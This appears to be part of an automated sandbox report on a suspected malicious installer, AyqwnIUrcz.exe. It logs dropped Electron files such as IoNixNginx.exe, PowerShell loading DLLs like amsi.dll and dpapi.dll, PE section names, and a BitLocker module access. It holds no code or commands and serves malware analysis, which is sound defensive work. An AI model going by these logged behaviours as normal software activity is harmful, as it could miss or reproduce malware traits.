Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dxva2.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: msvproc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: AyqwnIUrcz.exeStatic PE information: certificate valid
Source: AyqwnIUrcz.exeStatic file information: File size 64824672 > 1048576
Source: AyqwnIUrcz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: ffmpeg.dll.5.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll.5.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll.5.drStatic PE information: section name: .retplne
Source: ffmpeg.dll.5.drStatic PE information: section name: _RDATA
Source: IoNixNginx.exe.5.drStatic PE information: section name: .00cfg
Source: IoNixNginx.exe.5.drStatic PE information: section name: .gxfg
Source: IoNixNginx.exe.5.drStatic PE information: section name: .retplne
Source: IoNixNginx.exe.5.drStatic PE information: section name: .rodata
Source: IoNixNginx.exe.5.drStatic PE information: section name: CPADinfo
Source: IoNixNginx.exe.5.drStatic PE information: section name: LZMADEC
Source: IoNixNginx.exe.5.drStatic PE information: section name: _RDATA
Source: IoNixNginx.exe.5.drStatic PE information: section name: malloc_h
Source: libEGL.dll.5.drStatic PE information: section name: .00cfg
Source: libEGL.dll.5.drStatic PE information: section name: .gxfg
Source: libEGL.dll.5.drStatic PE information: section name: .retplne
Source: libEGL.dll.5.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll.5.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll.5.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll.5.drStatic PE information: section name: .retplne
Source: libGLESv2.dll.5.drStatic PE information: section name: _RDATA
Source: vk_swiftshader.dll.5.drStatic PE information: section name: .00cfg
Source: vk_swiftshader.dll.5.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll.5.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll.5.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll.5.drStatic PE information: section name: .00cfg
Source: vulkan-1.dll.5.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll.5.drStatic PE information: section name: .retplne
Source: vulkan-1.dll.5.drStatic PE information: section name: _RDATA
Source: ffmpeg.dll0.5.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll0.5.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll0.5.drStatic PE information: section name: .retplne
Source: ffmpeg.dll0.5.drStatic PE information: section name: _RDATA
Source: IoNixNginx.exe0.5.drStatic PE information: section name: .00cfg
Source: IoNixNginx.exe0.5.drStatic PE information: section name: .gxfg
Source: IoNixNginx.exe0.5.drStatic PE information: section name: .retplne
Source: IoNixNginx.exe0.5.drStatic PE information: section name: .rodata
Source: IoNixNginx.exe0.5.drStatic PE information: section name: CPADinfo
Source: IoNixNginx.exe0.5.drStatic PE information: section name: LZMADEC
Source: IoNixNginx.exe0.5.drStatic PE information: section name: _RDATA
Source: IoNixNginx.exe0.5.drStatic PE information: section name: malloc_h
Source: libEGL.dll0.5.drStatic PE information: section name: .00cfg
Source: libEGL.dll0.5.drStatic PE information: section name: .gxfg
Source: libEGL.dll0.5.drStatic PE information: section name: .retplne
Source: libEGL.dll0.5.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll0.5.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll0.5.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll0.5.drStatic PE information: section name: .retplne
Source: libGLESv2.dll0.5.drStatic PE information: section name: _RDATA
Source: vk_swiftshader.dll0.5.drStatic PE information: section name: .00cfg
Source: vk_swiftshader.dll0.5.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll0.5.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll0.5.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll0.5.drStatic PE information: section name: .00cfg
Source: vulkan-1.dll0.5.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll0.5.drStatic PE information: section name: .retplne
Source: vulkan-1.dll0.5.drStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\libGLESv2.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\libEGL.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\IoNixNginx.exe
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\ffmpeg.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\vk_swiftshader.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\libGLESv2.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\libEGL.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\ffmpeg.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\vulkan-1.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\nsis7z.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\resources\elevate.exe
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\System.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\vk_swiftshader.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\vulkan-1.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user~1\AppData\Local\Temp\nslCD8A.tmp\7z-out\LICENSE.electron.txt
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\LICENSE.electron.txt

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
